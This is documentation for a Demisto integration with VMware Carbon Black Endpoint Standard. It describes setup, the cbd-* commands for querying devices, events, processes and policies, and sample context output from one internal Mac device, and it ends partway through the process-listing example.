VMware Carbon Black Endpoint Standard

Overview


Use the VMware Carbon Black Endpoint Standard integration to manage Carbon Black policies, devices and processes on Demisto.

Use cases


  • Get information about events, policies, devices, and processes on Carbon Black.
  • Update events, policies, devices, and processes on Carbon Black.
  • Delete rules from policies.
  • Create new policies.

Configure VMware Carbon Black Endpoint Standard on Demisto


  1. Navigate to Settings > Integrations > Servers & Services.
  2. Search for VMware Carbon Black Endpoint Standard.
  3. Click Add instance to create and configure a new integration.
    • Name : a textual name for the integration instance.
    • Server URL (example: https://192.168.0.1)
    • API Key
    • API Version
    • Connector ID
    • Fetch incidents
    • Incident type
    • SIEM key: Use to fetch incidents.
    • SIEM Connector ID: Use to fetch incidents.
    • Do not validate server certificate (not secure)
    • Use system proxy settings
  4. Click Test to validate the URLs, token, and connection.

Commands


  1. Get the status of multiple devices: cbd-get-devices-status
  2. Get the status of a specified device: cbd-get-device-status
  3. Change the security policy assigned to a device: cbd-change-device-status
  4. Get multiple events: cbd-find-events
  5. Get a specified event: cbd-find-event
  6. Get multiple processes: cbd-find-processes
  7. Get alert details: cbd-get-alert-details
  8. Get all policy details: cbd-get-policies
  9. Get the details of a specified policy: cbd-get-policy
  10. Create a policy: cbd-create-policy
  11. Update a policy: cbd-update-policy
  12. Delete a policy: cbd-delete-policy
  13. Add a rule to a policy: cbd-add-rule-to-policy
  14. Delete a rule from a policy: cbd-delete-rule-from-policy
  15. Update a rule in a policy: cbd-update-rule-in-policy
  16. Set a policy: cbd-set-policy

Get the status of multiple devices


Retrieves the status of multiple devices, as specified by further input.

Base Command

cbd-get-devices-status

Input
Parameter Description More Information
hostName

Host name of the device to search for.

Case insensitive

hostNameExact Exact host name of device to search for Case sensitive
ownerName

Device owner name

Case insensitive

ownerNameExact Exact device owner name Case sensitive
ipAddress External or internal IP address of the device to search for -
start

Shows result from this row and after

-

rows

Maximum number of rows of result.

This parameter can be limited on the Cb Defense server side

Context Output
Path Description
CarbonBlackDefense.GetDevicesStatus.Results.ActivationCodeExpiryTime Activation code expiry time
CarbonBlackDefense.GetDevicesStatus.Results.LastExternalIpAddress Last external IP address
CarbonBlackDefense.GetDevicesStatus.Results.LastLocation Last location
CarbonBlackDefense.GetDevicesStatus.Results.LastReportedTime Last reported time
CarbonBlackDefense.GetDevicesStatus.Results.LastShutdownTime Last shutdown time
CarbonBlackDefense.GetDevicesStatus.Results.OsVersion Operating system version
CarbonBlackDefense.GetDevicesStatus.Results.PolicyId Policy ID
CarbonBlackDefense.GetDevicesStatus.Results.RegisteredTime Registered time
CarbonBlackDefense.GetDevicesStatus.Results.Status Status
CarbonBlackDefense.GetDevicesStatus.Results.DeviceId Device ID
CarbonBlackDefense.GetDevicesStatus.Results.DeviceOwnerId Device owner ID
CarbonBlackDefense.GetDevicesStatus.Results.DeviceType Description Device type
CarbonBlackDefense.GetDevicesStatus.Results.OrganizationId Organization ID
CarbonBlackDefense.GetDevicesStatus.Results.SensorVersion Sensor version
CarbonBlackDefense.GetDevicesStatus.Results.TargetPriorityType Target priority type
CarbonBlackDefense.GetDevicesStatus.Results.Email Email address
CarbonBlackDefense.GetDevicesStatus.Results.LastContact Last contact
CarbonBlackDefense.GetDevicesStatus.Results.OrganizationName Organization name
CarbonBlackDefense.GetDevicesStatus.Results.SensorStates Sensor states
CarbonBlackDefense.GetDevicesStatus.Results.AvStatus AV status
CarbonBlackDefense.GetDevicesStatus.Results.LastInternalIpAddress Last internal IP address
CarbonBlackDefense.GetDevicesStatus.Results.Name Name
CarbonBlackDefense.GetDevicesStatus.Results.PolicyName Policy name
CarbonBlackDefense.GetDevicesStatus.Results.SensorOutOfDate Sensor out-of-date
CarbonBlackDefense.GetDevicesStatus.Results.TestId Test ID

Command Example

!cbd-get-devices-status rows="1"

Context Example
CarbonBlackDefense:{} 1 item
GetDevicesStatus:{} 1 item
Results:{} 25 items
ActivationCodeExpiryTime:1524157210454
AvStatus:null
LastContact:1533646970617
LastLocation:OFFSITE
Name:cberninger-mac2
LastExternalIpAddress:67.143.208.113
TestId:-1
PolicyId:6525
OrganizationId:1105
RegisteredTime:1523552410489
TargetPriorityType:MEDIUM
DeviceType:MAC
DeviceId:844355
Status:REGISTERED
OsVersion:MAC OS X 10.10.5
LastReportedTime:1533642023089
DeviceOwnerId:278380
LastShutdownTime:1533587921518
SensorOutOfDate:false
LastInternalIpAddress:192.168.2.125
SensorStates:[] 5 items
0:ACTIVE
1:LIVE_RESPONSE_NOT_RUNNING
2:LIVE_RESPONSE_NOT_KILLED
3:LIVE_RESPONSE_DISABLED
4:SECURITY_CENTER_OPTLN_DISABLED
Email:cberninger
PolicyName:default
OrganizationName:cb-internal-alliances.com
SensorVersion:3.0.2.8
Human Readable Output
ActivationCodeExpiryTime 1524157210454
AvStatus
DeviceId 844355
DeviceOwnerId 278380
DeviceType MAC
Email cberninger
LastContact 1533646970617
LastExternalIpAddress 67.143.208.113
LastInternalIpAddress 192.168.2.125
LastLocation OFFSITE
LastReportedTime 1533642023089
LastShutdownTime 1533587921518
Name cberninger-mac2
OrganizationId 1105
OrganizationName cb-internal-alliances.com
OsVersion MAC OS X 10.10.5
PolicyId 6525
PolicyName default
RegisteredTime 1523552410489
SensorOutOfDate false

Get the status of a specified device


Retrieves the status of a specified device.

Base Code

cbd-get-device-status

Input
Parameter Description
deviceId

Individual device ID

Context Output
Path Description
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.TargetPriorityType Target priority type
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.OrganizationId Organization ID
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.CreateTime Time of creation
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.DeviceId Device ID
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Email Email address
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastInternalIpAddress Last internal IP address
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastLocation Last location
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.OsVersion Operating system version
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.AvStatus AV status
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastExternalIpAddress Last external IP address
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.RegisteredTime Time of registration
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastContact Last contact
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Status Status
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.TestId Test ID
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.PolicyId Policy ID
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.UpdateVersion Update version
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.OrganizationName Organization name
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.RootedByAnalytics Rooted ByAnalytics
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.SensorVersion Sensor version
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.DeviceType Device type
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.PolicyName Policy name
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.RootedByAnalyticsTime Rooted ByAnalytics Time
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.SensorOutOfDate Sensor out-of-date
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.SensorStates Sensor states
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Name Name
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Id ID
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastReportedTime Last reported time
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.DeviceOwnerId Device owner ID

Command Example

!cbd-get-device-status deviceId="844355"

Context Example
CarbonBlackDefense:{} 1 item
GetDeviceStatus:{} 1 item
DeviceInfo:{} 25 items
ActivationCodeExpiryTime:null
AvStatus:null
LastContact:1533648166041
LastLocation:OFFSITE
Name:cberninger-mac2
LastExternalIpAddress:67.143.208.113
TestId:-1
PolicyId:6525
OrganizationId:1105
RegisteredTime:1523552410489
TargetPriorityType:MEDIUM
DeviceType:MAC
DeviceId:844355
Status:REGISTERED
OsVersion:MAC OS X 10.10.5
LastReportedTime:1533642023089
DeviceOwnerId:278380
LastShutdownTime:1533587921518
SensorOutOfDate:false
LastInternalIpAddress:192.168.2.125
SensorStates:[] 5 items
0:ACTIVE
1:LIVE_RESPONSE_NOT_RUNNING
2:LIVE_RESPONSE_NOT_KILLED
3:LIVE_RESPONSE_DISABLED
4:SECURITY_CENTER_OPTLN_DISABLED
Email:cberninger
PolicyName:default
OrganizationName:cb-internal-alliances.com
SensorVersion:3.0.2.8
Human Readable Output
ActivationCodeExpiryTime
AvStatus
DeviceId 844355
DeviceOwnerId 278380
DeviceType MAC
Email cberninger
LastContact 1533648166041
LastExternalIpAddress 67.143.208.113
LastInternalIpAddress 192.168.2.125
LastLocation OFFSITE
LastReportedTime 1533642023089
LastShutdownTime 1533587921518
Name cberninger-mac2
OrganizationId 1105
OrganizationName cb-internal-alliances.com
OsVersion MAC OS X 10.10.5
PolicyId 6525
PolicyName default
RegisteredTime 1523552410489
SensorOutOfDate false

Change the security policy assigned to a device


Changes the security policy assigned to a specified device.

Base Command

cbd-change-device-status

Input
Parameter Description
deviceId

The device ID

policyId

The policy ID

policyName

The policy name

Context Output
Path Description
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.TargetPriorityType Target priority type
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.OrganizationId Organization ID
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.CreateTime Time of creation
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.DeviceId Device ID
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Email Email address
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastInternalIpAddress Last internal IP address
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastLocation Last location
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.OsVersion Operating system version
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.AvStatus Anti-virus status
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastExternalIpAddress Last external IP address
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.RegisteredTime Registration time
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastContact Last contact
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Status Status
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.TestId Test ID
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.PolicyId Policy ID
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.UpdateVersion Update version
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.OrganizationName Organization name
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.RootedByAnalytics Rooted ByAnalytics
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.SensorVersion Sensor version
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.DeviceType Device type
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.PolicyName Policy name
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.RootedByAnalyticsTime Rooted ByAnalytics time
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.SensorOutOfDate Sensor out-of-date date
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.SensorStates Sensor states
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Name Name
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Id ID
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastReportedTime Time of last report
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.DeviceOwnerId Device owner ID
Command Example

!cbd-change-device-status deviceId="844355" policyName="default"

Context Example
CarbonBlackDefense:{} 1 item
ChangeDeviceStatus:{} 1 item
DeviceInfo:{} 24 items
AvStatus:null
LastContact:1533648445513
LastLocation:OFFSITE
Name:cberninger-mac2
LastExternalIpAddress:67.143.208.113
TestId:-1
PolicyId:6525
OrganizationId:1105
RegisteredTime:1523552410489
TargetPriorityType:MEDIUM
DeviceType:MAC
DeviceId:844355
Status:REGISTERED
OsVersion:MAC OS X 10.10.5
LastReportedTime:1533642023089
DeviceOwnerId:278380
LastShutdownTime:1533587921518
SensorOutOfDate:false
LastInternalIpAddress:192.168.2.125
SensorStates:[] 5 items
0:ACTIVE
1:LIVE_RESPONSE_NOT_RUNNING
2:LIVE_RESPONSE_NOT_KILLED
3:LIVE_RESPONSE_DISABLED
4:SECURITY_CENTER_OPTLN_DISABLED
Email:cberninger
PolicyName:default
OrganizationName:cb-internal-alliances.com
SensorVersion:3.0.2.8
Human Readable Output
AvStatus
DeviceId 844355
DeviceOwnerId 278380
DeviceType MAC
Email cberninger
LastContact 1533648445513
LastExternalIpAddress 67.143.208.113
LastInternalIpAddress 192.168.2.125
LastLocation OFFSITE
LastReportedTime 1533642023089
LastShutdownTime 1533587921518
Name cberninger-mac2
OrganizationId 1105
OrganizationName cb-internal-alliances.com
OsVersion MAC OS X 10.10.5
PolicyId 6525
PolicyName default
RegisteredTime 1523552410489
SensorOutOfDate false
SensorStates ACTIVE,LIVE_RESPONSE_NOT_RUNNING,LIVE_RESPONSE_NOT_KILLED,LIVE_RESPONSE_DISABLED,SECURITY_CENTER_OPTLN_DISABLED

Get multiple events


Returns multiple event details, as specified by further input.

Base Command

cbd-find-events

Input
Parameter Description More Information
hostName

The host name of the event to search for

Case in sensitive.

hostNameExact The exact host name of the event to find Case sensitive.
ownerName Owner name of the event to search for Case in sensitive.
ownerNameExact The exact owner name of the event to search for Case sensitive.
ipAddress

External or internal IP address

-

sha256hash

Searches for events generated by a process with this SHA-256 hash

Must be in lowercase.

applicationName

Searches for events generated by a process with this application name

Must be in lowercase.

eventType Searches for events associated with this event type -
searchWindow

Events generated within this time frame

Default is one day.

Events might not be available after 30 days due to retention policies.

start Shows result from this row and after -
rows Maximum number of rows of result This parameter can be limited on the Cb Defense server side.

Context Output
Path Description
CarbonBlackDefense.FindEvents.Results.EventType Event type
CarbonBlackDefense.FindEvents.Results.ProcessDetails.MilisSinceProcessStart Milliseconds since the beginning of the process
CarbonBlackDefense.FindEvents.Results.ProcessDetails.Name Name
CarbonBlackDefense.FindEvents.Results.ProcessDetails.PrivatePid Private PID
CarbonBlackDefense.FindEvents.Results.ProcessDetails.ProcessId Process ID
CarbonBlackDefense.FindEvents.Results.ShortDescription Short description
CarbonBlackDefense.FindEvents.Results.CreateTime Time of creation
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceName Device name
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceVersion Device version
CarbonBlackDefense.FindEvents.Results.DeviceDetails.PolicyName Policy name
CarbonBlackDefense.FindEvents.Results.DeviceDetails.TargetPriorityType Target priority type
CarbonBlackDefense.FindEvents.Results.DeviceDetails.AgentLocation Agent location
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceId Device ID
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceIpV4Address IpV4 address of the device
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.AreaCode Area code
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.CountryCode Country code
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.Latitude Latitude
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.Longitude Longitude
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.City City
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.CountryName Country name
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.DmaCode DMA code
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.MetroCode Metro code
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.PostalCode Postal code
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.Region Region
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceIpAddress Device IP address
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceType Device type
CarbonBlackDefense.FindEvents.Results.DeviceDetails.Email Email address
CarbonBlackDefense.FindEvents.Results.DeviceDetails.TargetPriorityCode Target priority code
CarbonBlackDefense.FindEvents.Results.EventId Event ID
CarbonBlackDefense.FindEvents.Results.EventTime Event time
CarbonBlackDefense.FindEvents.Results.LongDescription Long description
CarbonBlackDefense.FindEvents.Results.NetFlow.DestAddress Dest address
CarbonBlackDefense.FindEvents.Results.NetFlow.DestPort Dest port
CarbonBlackDefense.FindEvents.Results.NetFlow.PeerFqdn Peer Fqdn
CarbonBlackDefense.FindEvents.Results.NetFlow.PeerIpAddress Peer IP address
CarbonBlackDefense.FindEvents.Results.NetFlow.PeerIpV4Address Peer IpV4 address
CarbonBlackDefense.FindEvents.Results.NetFlow.Service Service
CarbonBlackDefense.FindEvents.Results.NetFlow.SourceAddress Source address
CarbonBlackDefense.FindEvents.Results.NetFlow.SourcePort Source port
CarbonBlackDefense.FindEvents.Results.SelectedApp.ApplicationName Application name
CarbonBlackDefense.FindEvents.Results.SelectedApp.ApplicationPath Application path
CarbonBlackDefense.FindEvents.Results.SelectedApp.Md5Hash MD5 hash
CarbonBlackDefense.FindEvents.Results.SelectedApp.Sha256Hash SHA-256 hash
CarbonBlackDefense.FindEvents.Results.ThreatIndicators Threat indicators

Command Example

!cbd-find-events rows=1 </p?

Context Example
CarbonBlackDefense:{} 1 item
FindEvents:{} 2 items
Results:{} 10 items
ShortDescription:The application "cloud-drive-ui" successfully closed a TCP/6690 connection to 192.168.2.22:6690 (192.168.2.22).
LongDescription:The application "/Users/cberninger/.CloudStation/CloudStation.app/Contents/MacOS/cloud-drive-ui" closed a TCP/6690 connection to 192.168.2.22:6690 (192.168.2.22) from 192.168.2.125:56001. There were 8169 Bytes Received and 2863 Bytes Sent in less than 1 second. The device was off the corporate network using the public address 67.143.208.113 (192.168.2.125, located in United States). The operation was successful.
SelectedApp:{} 7 items
ApplicationName:cloud-drive-ui
ApplicationPath:/Users/cberninger/.CloudStation/CloudStation.app/Contents/MacOS/cloud-drive-ui
EffectiveReputation:LOCAL_WHITE
EffectiveReputationSource:PRE_EXISTING
Md5Hash:b43632f807770d141008deb988a65ad9
ReputationProperty:NOT_LISTED
Sha256Hash:f649ce0c8d5ca63be86e00877632c6390af772eed86c07b3db5b818c30ab700b
EventTime:1533649991975
CreateTime:1533650036964
DeviceDetails:{} 12 items
DeviceName:cberninger-mac2
DeviceVersion:MAC OS X 10.10.5
TargetPriorityCode:1
DeviceLocation:{} 6 items
City:null
CountryCode:US
CountryName:United States
Latitude:37.751007
Longitude:-97.822
Region:null
TargetPriorityType:MEDIUM
DeviceType:MAC
DeviceId:844355
DeviceIpAddress:67.143.208.113
DeviceIpV4Address:67.143.208.113
AgentLocation:OFFSITE
Email:cberninger
PolicyName:default
TargetApp:{} 5 items
ApplicationName:null
EffectiveReputation:null
EffectiveReputationSource:null
ReputationProperty:null
Sha256Hash:null
ProcessDetails:{} 11 items
FullUserName:cberninger
PrivatePid:1071-1533502548722-245
ProcessId:1071
Name:cloud-drive-ui
TargetCommandLine:null
MilisSinceProcessStart:147443253
UserName:cberninger
TargetPrivatePid:null
TargetPid:null
TargetName:null
CommandLine:null
EventType:NETWORK
EventId:4ad25ae99a4911e88515b3c49ffeda59
TotalResults:{} 1 item
TotalResults:10666
Endpoint:{} 4 items
Domain:null
Hostname:cberninger-mac2
IPAddress:67.143.208.113
OS:MAC
Process:{} 9 items
Path:null
SHA1:null
ParentID:null
PID:1071
Name:cloud-drive-ui
Endpoint:null
ParentName:null
MD5:null
CommandLine:null
Human Readable
CreateTime 1533650036964
DeviceDetails AgentLocation OFFSITE
DeviceDetails DeviceId 844355
DeviceDetails DeviceIpAddress 67.143.208.113
DeviceDetails DeviceIpV4Address 67.143.208.113
DeviceDetails DeviceLocation City
DeviceDetails DeviceLocation CountryCode US
DeviceDetails DeviceLocation CountryName United States
DeviceDetails DeviceLocation Latitude 37.751007
DeviceDetails DeviceLocation Longitude -97.822
DeviceDetails DeviceLocation Region
DeviceDetails DeviceName cberninger-mac2
DeviceDetails DeviceType MAC
DeviceDetails DeviceVersion MAC OS X 10.10.5
DeviceDetails Email cberninger
DeviceDetails PolicyName default
DeviceDetails TargetPriorityCode 1
DeviceDetails TargetPriorityType MEDIUM
EventId 4ad25ae99a4911e88515b3c49ffeda59
EventTime 1533649991975

Get a specified event


Returns a the details of a specified event.

Base Command

cbd-find-event

Input
Parameter Description
eventId Event ID

Context Output
Path Description
CarbonBlackDefense.GetAlertDetails.EventInfo.ShortDescription Short description
CarbonBlackDefense.GetAlertDetails.EventInfo.TargetHash.ApplicationName Application name
CarbonBlackDefense.GetAlertDetails.EventInfo.TargetHash.ReputationProperty Reputation property
CarbonBlackDefense.GetAlertDetails.EventInfo.TargetHash.Sha256Hash SHA-256 hash
CarbonBlackDefense.GetAlertDetails.EventInfo.EventType Event type
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessHash.Md5Hash MD5 hash
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessHash.Sha256Hash SHA-256 hash
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessHash.ApplicationPath Application path
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessHash.ReputationProperty Reputation property
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessHash.ApplicationName Application name
CarbonBlackDefense.GetAlertDetails.EventInfo.OrgDetails.OrganizationId Organization ID
CarbonBlackDefense.GetAlertDetails.EventInfo.OrgDetails.OrganizationName Organization name
CarbonBlackDefense.GetAlertDetails.EventInfo.OrgDetails.OrganizationType Organization type
CarbonBlackDefense.GetAlertDetails.EventInfo.ParentHash.ApplicationName Application name
CarbonBlackDefense.GetAlertDetails.EventInfo.ParentHash.Sha256Hash SHA-256 hash
CarbonBlackDefense.GetAlertDetails.EventInfo.EventId Event ID
CarbonBlackDefense.GetAlertDetails.EventInfo.LongDescription Long description
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceIpV4Address Device IpV4 address
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceType Device type
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.Email Email address
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.TargetPriorityCode Target priority code
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.AgentLocation Agent location path
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceHostName Device host name
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceId Device ID
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.GroupName Group name
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceVersion Device version
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.TargetPriorityType Target priority type
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceIpAddress Device IP address
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.Latitude Latitude
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.City City
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.CountryCode Country code
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.DmaCode DMA code
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.Longitude Longitude
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.MetroCode Metro code
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.PostalCode Postal code
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.Region Region
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.AreaCode Area code
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.CountryName Country name
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceName Device name
CarbonBlackDefense.GetAlertDetails.EventInfo.CreateTime Time of creation
CarbonBlackDefense.GetAlertDetails.EventInfo.EventTime Event time
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.FullUserName Full user name
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.Name Name
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.ParentCommandLine Parent command line
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.ParentName Parent name
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.ParentPid Parent PID
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.ProcessId Process ID
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.CommandLine Command line
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.MilisSinceProcessStart Milisecconds since process start
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.TargetCommandLine Target command line
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.TargetPid Target PID
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.UserName User name
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.ParentPrivatePid Parent private PID
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.PrivatePid Private PID
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.TargetName Target name
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.TargetPrivatePid Target private PID
CarbonBlackDefense.GetAlertDetails.EventInfo.ThreatIndicators Threat indicators

Command Example

!cbd-find-event eventId="4ad25ae99a4911e88515b3c49ffeda59"

Context Example
CarbonBlackDefense:{} 1 item
FindEvent:{} 1 item
EventInfo:{} 13 items
ShortDescription:The application "cloud-drive-ui" successfully closed a TCP/6690 connection to 192.168.2.22:6690 (192.168.2.22).
LongDescription:The application "/Users/cberninger/.CloudStation/CloudStation.app/Contents/MacOS/cloud-drive-ui" closed a TCP/6690 connection to 192.168.2.22:6690 (192.168.2.22) from 192.168.2.125:56001. There were 8169 Bytes Received and 2863 Bytes Sent in less than 1 second. The device was off the corporate network using the public address 67.143.208.113 (192.168.2.125, located in United States). The operation was successful.
EventTime:1533649991975
CreateTime:1533650036964
DeviceDetails:{} 13 items
DeviceName:cberninger-mac2
DeviceVersion:MAC OS X 10.10.5
TargetPriorityCode:1
DeviceHostName:null
GroupName:null
DeviceLocation:{} 10 items
CountryName:United States
CountryCode:US
DmaCode:0
MetroCode:0
City:null
Latitude:37.751007
Longitude:-97.822
Region:null
PostalCode:null
AreaCode:0
TargetPriorityType:MEDIUM
DeviceType:MAC
DeviceId:844355
DeviceIpAddress:67.143.208.113
DeviceIpV4Address:67.143.208.113
AgentLocation:OFFSITE
Email:cberninger
ProcessDetails:{} 15 items
ParentPid:null
FullUserName:cberninger
PrivatePid:1071-1533502548722-245
ProcessId:1071
Name:cloud-drive-ui
TargetCommandLine:null
ParentPrivatePid:null
MilisSinceProcessStart:147443253
ParentName:null
ParentCommandLine:null
UserName:cberninger
TargetPrivatePid:null
TargetPid:null
TargetName:null
CommandLine:null
EventType:NETWORK
EventId:4ad25ae99a4911e88515b3c49ffeda59
ParentHash:{} 2 items
ApplicationName:null
Sha256Hash:null
ProcessHash:{} 5 items
ApplicationName:null
ApplicationPath:null
Md5Hash:null
ReputationProperty:null
Sha256Hash:null
ThreatIndicators:[] 2 items
0:UNKNOWN_APP
1:NETWORK_FLOW
OrgDetails:{} 3 items
OrganizationId:null
OrganizationName:null
OrganizationType:null
TargetHash:{} 3 items
ApplicationName:null
ReputationProperty:null
Sha256Hash:null
Human Readable Output
CreateTime 1533650036964
DeviceDetails AgentLocation OFFSITE
DeviceDetails DeviceHostName
DeviceDetails DeviceId 844355
DeviceDetails DeviceIpAddress 67.143.208.113
DeviceDetails DeviceIpV4Address 67.143.208.113
DeviceDetails DeviceLocation AreaCode 0
DeviceDetails DeviceLocation City
DeviceDetails DeviceLocation CountryCode US
DeviceDetails DeviceLocation CountryName United States
DeviceDetails DeviceLocation DmaCode 0
DeviceDetails DeviceLocation Latitude 37.751007
DeviceDetails DeviceLocation Longitude -97.822
DeviceDetails DeviceLocation MetroCode 0
DeviceDetails DeviceLocation PostalCode
DeviceDetails DeviceLocation Region
DeviceDetails DeviceName cberninger-mac2
DeviceDetails DeviceType MAC
DeviceDetails DeviceVersion MAC OS X 10.10.5
DeviceDetails Email cberninger

Get multiple processes


Returns the details of multiple process, as specified by further input.

Base Command

cbd-find-processes

Input
Parameter Description More Information
hostNameExact The exact hostname. Case sensitive.
ownerName Case insensitive owner name. Case in sensitive.
ownerNameExact

Exact owner name

Case sensitive.

ipAddress External or internal IP address -
searchWindow

Events generated within a given time frame

Default is one day.

Events may not be available after 30 days due to retention policies.

start Shows result from this row and after -
rows Maximum number of rows of result This parameter can be limited on the Cb Defense server side.

Context Output
Path Description
CarbonBlackDefense.GetProcesses.ApplicationName Application name
CarbonBlackDefense.GetProcesses.ProcessId Process ID
CarbonBlackDefense.GetProcesses.NumEvents Number of events
CarbonBlackDefense.GetProcesses.ApplicationPath Application path
CarbonBlackDefense.GetProcesses.PrivatePid Private PID
CarbonBlackDefense.GetProcesses.Sha256Hash SHA-256 hash
CarbonBlackDefense.GetProcesses.TotalResults Total results

Command Example

!cbd-find-processes ipAddress="67.143.208.113" rows=2

Context Example
CarbonBlackDefense:{} 1 item
GetProcesses:[] 3 items
0:{} 6 items
ApplicationName:Google Chrome
ApplicationPath:/Applications/Google Chrome.app/Contents/MacOS/Google Chrome
NumEvents:3580
PrivatePid:81577-1533502547808-202
ProcessId:81577
